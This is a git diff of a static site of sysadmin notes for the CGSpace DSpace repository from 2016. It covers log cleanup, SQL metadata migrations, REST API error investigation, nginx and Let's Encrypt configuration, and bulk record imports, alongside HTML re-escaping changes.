@ -126,7 +126,7 @@ Also, I noticed the checker log has some errors we should pay attention to:
<li>This will save us a few gigs of backup space we&rsquo;re paying for on S3</li>
<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li>
</ul>
<pre><code>Run start time: 03/06/2016 04:00:22
<pre tabindex="0"><code>Run start time: 03/06/2016 04:00:22
Error retrieving bitstream ID 71274 from asset store.
java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290601546459645925328536011917633626 (Too many open files)
at java.io.FileInputStream.open(Native Method)
@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
******************************************************
</code></pre><ul>
<li>So this would be the <code>tomcat7</code> Unix user, who seems to have a default limit of 1024 files in its shell</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process&rsquo; limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>Looks like cron will read limits from <code>/etc/security/limits.*</code> so we can do something for the tomcat7 user there (see the sketch after this list)</li>
<li>Submit pull request for Tomcat 7 limits in Ansible dspace role (<a href="https://github.com/ilri/rmg-ansible-public/pull/30">#30</a>)</li>
</ul>
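<ul>
<li>A minimal sketch of such a limits entry (the drop-in path <code>/etc/security/limits.d/tomcat7.conf</code> is an assumption; 16384 matches the value we already set for the Tomcat process):</li>
</ul>
<pre><code># /etc/security/limits.d/tomcat7.conf (hypothetical path)
tomcat7    soft    nofile    16384
tomcat7    hard    nofile    16384
</code></pre>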
@ -158,11 +158,11 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
<ul>
<li>Reduce Amazon S3 storage used for logs from 46 GB to 6 GB by deleting a bunch of logs we don&rsquo;t need!</li>
</ul>
<pre><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
<pre tabindex="0"><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
# grep checker.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
</code></pre><ul>
<li>Also, adjust the cron jobs for backups so they only backup <code>dspace.log</code> and some stats files (.dat)</li>
<li>Try to do some metadata field migrations using the Atmire batch UI (<code>dc.Species</code> → <code>cg.species</code>) but it took several hours and even missed a few records</li>
@ -171,7 +171,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
<ul>
<li>A better way to move metadata on this scale is via SQL, for example <code>dc.type.output</code> → <code>dc.type</code> (their IDs in the metadatafieldregistry are 66 and 109, respectively):</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set metadata_field_id=109 where metadata_field_id=66;
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=109 where metadata_field_id=66;
UPDATE 40852
</code></pre><ul>
<li>After that an <code>index-discovery -bf</code> is required</li>
@ -182,7 +182,7 @@ UPDATE 40852
<li>Write shell script to do the migration of fields: <a href="https://gist.github.com/alanorth/72a70aca856d76f24c127a6e67b3342b">https://gist.github.com/alanorth/72a70aca856d76f24c127a6e67b3342b</a></li>
<li>Testing with a few fields it seems to work well:</li>
</ul>
<pre><code>$ ./migrate-fields.sh
<pre tabindex="0"><code>$ ./migrate-fields.sh
UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
UPDATE 40883
UPDATE metadatavalue SET metadata_field_id=202 WHERE metadata_field_id=72
@ -199,13 +199,13 @@ UPDATE 51258
<li>Looking at the DOI issue <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=678507860">reported by Leroy from CIAT a few weeks ago</a></li>
<li>It seems the <code>dx.doi.org</code> URLs are much more proper in our repository!</li>
</ul>
<pre><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://dx.doi.org%&#39;;
count
-------
5638
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://doi.org%&#39;;
count
-------
3
@ -221,7 +221,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
<ul>
<li>Looking at quality of WLE data (<code>cg.subject.iwmi</code>) in SQL:</li>
</ul>
<pre><code>dspacetest=# select text_value, count(*) from metadatavalue where metadata_field_id=217 group by text_value order by count(*) desc;
<pre tabindex="0"><code>dspacetest=# select text_value, count(*) from metadatavalue where metadata_field_id=217 group by text_value order by count(*) desc;
</code></pre><ul>
<li>Listings and Reports is still not returning reliable data for <code>dc.type</code></li>
<li>I think we need to ask Atmire, as their documentation isn&rsquo;t too clear on the format of the filter configs</li>
@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
<li>I decided to keep the set of subjects that had <code>FMD</code> and <code>RANGELANDS</code> added, as those appear to have been added by request, and it might be the newer list</li>
<li>I found 226 blank metadatavalues:</li>
</ul>
<pre><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I think we should delete them and do a full re-index:</li>
</ul>
<pre><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 226
</code></pre><ul>
<li>I deleted them on CGSpace but I&rsquo;ll wait to do the re-index as we&rsquo;re going to be doing one in a few days for the metadata changes anyways</li>
@ -281,7 +281,7 @@ DELETE 226
</li>
<li>Test metadata migration on local instance again:</li>
</ul>
<pre><code>$ ./migrate-fields.sh
<pre tabindex="0"><code>$ ./migrate-fields.sh
UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
UPDATE 40885
UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
@ -294,11 +294,11 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
UPDATE 3872
UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
UPDATE 46075
$ JAVA_OPTS=&quot;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace index-discovery -bf
$ JAVA_OPTS=&#34;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace index-discovery -bf
</code></pre><ul>
<li>CGSpace was down but I&rsquo;m not sure why, this was in <code>catalina.out</code>:</li>
</ul>
<pre><code>Apr 18, 2016 7:32:26 PM com.sun.jersey.spi.container.ContainerResponse logException
<pre tabindex="0"><code>Apr 18, 2016 7:32:26 PM com.sun.jersey.spi.container.ContainerResponse logException
SEVERE: Mapped exception to response: 500 (Internal Server Error)
javax.ws.rs.WebApplicationException
at org.dspace.rest.Resource.processFinally(Resource.java:163)
@ -328,7 +328,7 @@ javax.ws.rs.WebApplicationException
<ul>
<li>Get handles for items that are using a given metadata field, ie <code>dc.Species.animal</code> (105):</li>
</ul>
<pre><code># select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=105);
<pre tabindex="0"><code># select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=105);
handle
-------------
10568/10298
@ -338,26 +338,26 @@ javax.ws.rs.WebApplicationException
</code></pre><ul>
<li>Delete metadata values for <code>dc.GRP</code> and <code>dc.icsubject.icrafsubject</code>:</li>
</ul>
<pre><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=96;
<pre tabindex="0"><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=96;
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=83;
</code></pre><ul>
<li>They are old ICRAF fields and we haven&rsquo;t used them since 2011 or so</li>
<li>Also delete them from the metadata registry</li>
<li>CGSpace went down again, <code>dspace.log</code> had this:</li>
</ul>
<pre><code>2016-04-19 15:02:17,025 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-04-19 15:02:17,025 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>I restarted Tomcat and PostgreSQL and now it&rsquo;s back up</li>
<li>I bet this is the same crash as yesterday, but I only saw the errors in <code>catalina.out</code></li>
<li>Looks to be related to this, from <code>dspace.log</code>:</li>
</ul>
<pre><code>2016-04-19 15:16:34,670 ERROR org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
<pre tabindex="0"><code>2016-04-19 15:16:34,670 ERROR org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
</code></pre><ul>
<li>We have 18,000 of these errors right now&hellip;</li>
<li>Delete a few more old metadata values: <code>dc.Species.animal</code>, <code>dc.type.journal</code>, and <code>dc.publicationcategory</code>:</li>
</ul>
<pre><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=105;
<pre tabindex="0"><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=105;
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=85;
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=95;
</code></pre><ul>
@ -369,7 +369,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>Migrate fields and re-deploy CGSpace with the new subject and type fields, run all system updates, and reboot the server</li>
<li>Field migration went well:</li>
</ul>
<pre><code>$ ./migrate-fields.sh
<pre tabindex="0"><code>$ ./migrate-fields.sh
UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
UPDATE 40909
UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
@ -387,7 +387,7 @@ UPDATE 46075
<li>Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)</li>
<li>Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:</li>
</ul>
<pre><code>$ grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-20
<pre tabindex="0"><code>$ grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-20
21252
</code></pre><ul>
<li>I found a recent discussion on the DSpace mailing list and I&rsquo;ve asked for advice there</li>
@ -423,7 +423,7 @@ UPDATE 46075
<li>Looks like the last one was &ldquo;down&rdquo; from about four hours ago</li>
<li>I think there must be something with this REST stuff:</li>
</ul>
<pre><code># grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-*
<pre tabindex="0"><code># grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-*
dspace.log.2016-04-01:0
dspace.log.2016-04-02:0
dspace.log.2016-04-03:0
@ -468,7 +468,7 @@ dspace.log.2016-04-27:7271
<ul>
<li>Logs for today and yesterday have zero references to this REST error, so I&rsquo;m going to open back up the REST API but log all requests</li>
</ul>
<pre><code>location /rest {
<pre tabindex="0"><code>location /rest {
access_log /var/log/nginx/rest.log;
proxy_pass http://127.0.0.1:8443;
}
@ -495,15 +495,15 @@ dspace.log.2016-04-27:7271
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<time datetime="2016-05-01T23:06:00+03:00">Sun May 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,13 +126,13 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<li>I have blocked access to the API now</li>
<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
</code></pre><ul>
<li>The two most frequent requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29</li>
<li>100% of the requests coming from Ethiopia are like this and result in an HTTP 500:</li>
</ul>
<pre><code>GET /rest/handle/10568/NaN?expand=parentCommunityList,metadata HTTP/1.1
<pre tabindex="0"><code>GET /rest/handle/10568/NaN?expand=parentCommunityList,metadata HTTP/1.1
</code></pre><ul>
<li>For now I&rsquo;ll block just the Ethiopian IP</li>
<li>The owner of that application has said that the <code>NaN</code> (not a number) is an error in his code and he&rsquo;ll fix it</li>
@ -152,7 +152,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<li>I will re-generate the Discovery indexes after re-deploying</li>
<li>Testing <code>renew-letsencrypt.sh</code> script for nginx</li>
</ul>
<pre><code>#!/usr/bin/env bash
<pre tabindex="0"><code>#!/usr/bin/env bash
readonly SERVICE_BIN=/usr/sbin/service
readonly LETSENCRYPT_BIN=/opt/letsencrypt/letsencrypt-auto
@ -166,8 +166,8 @@ LE_RESULT=$?
$SERVICE_BIN nginx start
if [[ &quot;$LE_RESULT&quot; != 0 ]]; then
echo 'Automated renewal failed:'
if [[ &#34;$LE_RESULT&#34; != 0 ]]; then
echo &#39;Automated renewal failed:&#39;
cat /var/log/letsencrypt/renew.log
@ -214,7 +214,7 @@ fi
<p>After completing the rebase I tried to build with the module versions Atmire had indicated as being 5.5 ready but I got this error:</p>
</li>
</ul>
<pre><code>[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:5.5: Could not find artifact com.atmire:atmire-metadata-quality-api:jar:5.5-2.10.1-0 in sonatype-releases (https://oss.sonatype.org/content/repositories/releases/) -&gt; [Help 1]
<pre tabindex="0"><code>[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:5.5: Could not find artifact com.atmire:atmire-metadata-quality-api:jar:5.5-2.10.1-0 in sonatype-releases (https://oss.sonatype.org/content/repositories/releases/) -&gt; [Help 1]
</code></pre><ul>
<li>I&rsquo;ve sent them a question about it</li>
<li>A user mentioned having problems with uploading a 33 MB PDF</li>
@ -240,7 +240,7 @@ fi
</li>
<li>Found ~200 messed up CIAT values in <code>dc.publisher</code>:</li>
</ul>
<pre><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &quot;% %&quot;;
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &#34;% %&#34;;
</code></pre><h2 id="2016-05-13">2016-05-13</h2>
<ul>
<li>More theorizing about CGcore</li>
@ -259,7 +259,7 @@ fi
<li>They have thumbnails on Flickr and elsewhere</li>
<li>In OpenRefine I created a new <code>filename</code> column based on the <code>thumbnail</code> column with the following GREL:</li>
</ul>
<pre><code>if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
<pre tabindex="0"><code>if(cells[&#39;thumbnails&#39;].value.contains(&#39;hqdefault&#39;), cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-2] + &#39;.jpg&#39;, cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-1])
</code></pre><ul>
<li>Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL</li>
<li>So for the <code>hqdefault.jpg</code> ones I just take the UUID (-2) and use it as the filename</li>
@ -269,7 +269,7 @@ fi
<ul>
<li>More quality control on <code>filename</code> field of CCAFS records to make processing in shell and SAFBuilder more reliable:</li>
</ul>
<pre><code>value.replace('_','').replace('-','')
<pre tabindex="0"><code>value.replace(&#39;_&#39;,&#39;&#39;).replace(&#39;-&#39;,&#39;&#39;)
</code></pre><ul>
<li>We need to hold off on moving <code>dc.Species</code> to <code>cg.species</code> because it is only used for plants, and might be better to move it to something like <code>cg.species.plant</code></li>
<li>And <code>dc.identifier.fund</code> is MOSTLY used for CPWF project identifier but has some other sponsorship things
@ -281,17 +281,17 @@ fi
</ul>
</li>
</ul>
<pre><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
</code></pre><h2 id="2016-05-20">2016-05-20</h2>
<ul>
<li>More work on CCAFS Video and Images records</li>
<li>For SAFBuilder we need to modify filename column to have the thumbnail bundle:</li>
</ul>
<pre><code>value + &quot;__bundle:THUMBNAIL&quot;
<pre tabindex="0"><code>value + &#34;__bundle:THUMBNAIL&#34;
</code></pre><ul>
<li>Also, I fixed some weird characters using OpenRefine&rsquo;s transform with the following GREL:</li>
</ul>
<pre><code>value.replace(/\u0081/,'')
<pre tabindex="0"><code>value.replace(/\u0081/,&#39;&#39;)
</code></pre><ul>
<li>Write shell script to resize thumbnails with height larger than 400 (a rough sketch is below): <a href="https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256">https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256</a></li>
<li>Upload 707 CCAFS records to DSpace Test</li>
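<ul>
<li>A hypothetical sketch of that resize logic (the real script is in the gist linked above), downscaling only JPEGs taller than 400 pixels with GraphicsMagick:</li>
</ul>
<pre><code>$ for f in *.jpg; do [ &quot;$(gm identify -format '%h' &quot;$f&quot;)&quot; -gt 400 ] &amp;&amp; gm convert &quot;$f&quot; -resize x400 &quot;$f&quot;; done
</code></pre>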
@ -309,12 +309,12 @@ fi
<ul>
<li>Export CCAFS video and image records from DSpace Test using the migrate option (<code>-m</code>):</li>
</ul>
<pre><code>$ mkdir ~/ccafs-images
<pre tabindex="0"><code>$ mkdir ~/ccafs-images
$ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~/ccafs-images -n 0 -m
</code></pre><ul>
<li>And then import to CGSpace:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
</code></pre><ul>
<li>But now we have double authors for &ldquo;CGIAR Research Program on Climate Change, Agriculture and Food Security&rdquo; in the authority</li>
<li>I&rsquo;m trying to do a Discovery index before messing with the authority index</li>
@ -322,19 +322,19 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
<li>Run system updates on DSpace Test, re-deploy code, and reboot the server</li>
<li>Clean up and import ~200 CTA records to CGSpace via CSV like:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &amp;&gt; ~/CTA-May30/CTA-42229.log
</code></pre><ul>
<li>Discovery indexing took a few hours for some reason, and after that I started the <code>index-authority</code> script</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace index-authority
</code></pre><h2 id="2016-05-31">2016-05-31</h2>
<ul>
<li>The <code>index-authority</code> script ran over night and was finished in the morning</li>
<li>Hopefully this was because we haven&rsquo;t been running it regularly and it will speed up next time</li>
<li>I am running it again with a timer to see:</li>
</ul>
<pre><code>$ time /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time /home/cgspace.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Cleaning the old index
@ -371,15 +371,15 @@ sys 0m20.540s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ Working on second phase of metadata migration, looks like this will work for mov
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ Working on second phase of metadata migration, looks like this will work for mov
<time datetime="2016-06-01T10:53:00+03:00">Wed Jun 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
</ul>
<pre><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
UPDATE 497
dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
UPDATE 14
@ -141,7 +141,7 @@ UPDATE 14
<li>While testing the configuration and theme changes for the upcoming metadata migration I found some issues with <code>cg.coverage.admin-unit</code></li>
<li>Seems that the Browse configuration in <code>dspace.cfg</code> can&rsquo;t handle the &lsquo;-&rsquo; in the field name:</li>
</ul>
<pre><code>webui.browse.index.12 = subregion:metadata:cg.coverage.admin-unit:text
<pre tabindex="0"><code>webui.browse.index.12 = subregion:metadata:cg.coverage.admin-unit:text
</code></pre><ul>
<li>But actually, I think since DSpace 4 or 5 (we are 5.1) the Browse indexes come from Discovery (defined in discovery.xml) so this is really just a parsing error</li>
<li>I&rsquo;ve sent a message to the DSpace mailing list to ask about the Browse index definition</li>
@ -154,13 +154,13 @@ UPDATE 14
<li>Investigating the CCAFS authority issue, I exported the metadata for the Videos collection</li>
<li>The top two authors are:</li>
</ul>
<pre><code>CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::500
<pre tabindex="0"><code>CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::500
CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::600
</code></pre><ul>
<li>So the only difference is the &ldquo;confidence&rdquo;</li>
<li>Ok, well THAT is interesting:</li>
</ul>
<pre><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, A. | ab606e3a-2b04-4c7d-9423-14beccf54257 | -1
@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
</code></pre><ul>
<li>And now an actually relevant example:</li>
</ul>
<pre><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence = 500;
count
-------
707
(1 row)
